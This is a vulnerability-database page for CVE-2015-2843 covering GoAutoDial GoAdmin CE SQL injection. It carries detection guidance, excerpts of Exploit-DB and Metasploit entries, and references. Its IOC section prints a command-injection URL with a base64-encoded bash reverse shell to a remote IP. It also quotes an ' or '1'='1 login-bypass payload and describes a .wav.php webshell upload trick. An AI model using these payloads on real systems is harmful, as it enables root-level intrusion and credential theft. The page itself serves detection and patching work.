CVE-2015-2843
published 2015-05-12CVE-2015-2843: Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
38.15%
98.4th percentile
Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1) user_name or (2) user_pass parameter in go_login.php or the PATH_INFO to (3) go_login/validate_credentials/admin/ or (4) index.php/go_site/go_get_user_info/.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goautodial | goadmin_ce | — | — |
| goautodial | goadmin_ce | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"↗
- →Detect SQLi authentication bypass attempts targeting the user_pass POST parameter with OR-based payloads (e.g., ' or '1'='1) sent to /index.php/go_login/validate_credentials or go_login.php ↗
- →Detect GET requests to /index.php/go_site/go_get_user_info/ containing SQL injection patterns such as single quotes or OR clauses in the PATH_INFO segment ↗
- →Detect command injection attempts in the PATH_INFO of /index.php/go_site/cpanel/ containing pipe characters (||), bash, base64, or eval keywords ↗
- →Detect file uploads to go_audiostore.php where the uploaded filename contains a double extension pattern matching *.wav.php (bypasses extension whitelist check) ↗
- →Monitor web server access logs for requests to /sounds/ directory containing files prefixed with 'go_' and ending in .php, indicating successful webshell upload ↗
- →Check for version string 1421902800 in changelog.txt to determine if the target is patched; absence of this string indicates a vulnerable version ↗
- →Command injection payload is delivered as a base64-encoded reverse bash shell; detect URL-encoded pipe sequences (%7C%7C) followed by base64 strings in requests to /index.php/go_site/cpanel/ ↗
- ·The vulnerable version range spans multiple build timestamps between 3.3-1406088000 and 3.3-1421902800; versions in between may also be vulnerable even if they received other updates ↗
- ·The SQLi authentication bypass assumes the default 'admin' user account has not been removed from the installation ↗
- ·Command injection executes with root privileges, making post-exploitation impact maximal on default GoAutoDial ISO builds ↗
- ·The Metasploit module defaults to SSL (port 443); detections should also cover non-SSL HTTP (port 80) deployments ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
exploitdb·2017-07-05
CVE-2015-2845 GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "GoAutoDial 3.3 Authentication Bypass / Command Injection",
'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded
Exploit-DB
GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
exploitdb·2015-04-21·CVSS 10.0
CVE-2015-2845 [CRITICAL] GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
---
Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21
Abstract:
Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.
Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.co
Metasploit
GoAutoDial 3.3 Authentication Bypass / Command Injection
metasploit
GoAutoDial 3.3 Authentication Bypass / Command Injection
GoAutoDial 3.3 Authentication Bypass / Command Injection
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. This module has been tested successfully on GoAutoDial version 3.3-1406088000.
No writeups or analysis indexed.
http://goautodial.org/news/21http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.htmlhttp://www.securityfocus.com/archive/1/535319/100/1100/threadedhttp://www.securityfocus.com/bid/74281https://www.exploit-db.com/exploits/36807/https://www.exploit-db.com/exploits/42296/http://goautodial.org/news/21http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.htmlhttp://www.securityfocus.com/archive/1/535319/100/1100/threadedhttp://www.securityfocus.com/bid/74281https://www.exploit-db.com/exploits/36807/https://www.exploit-db.com/exploits/42296/
2015-05-12
Published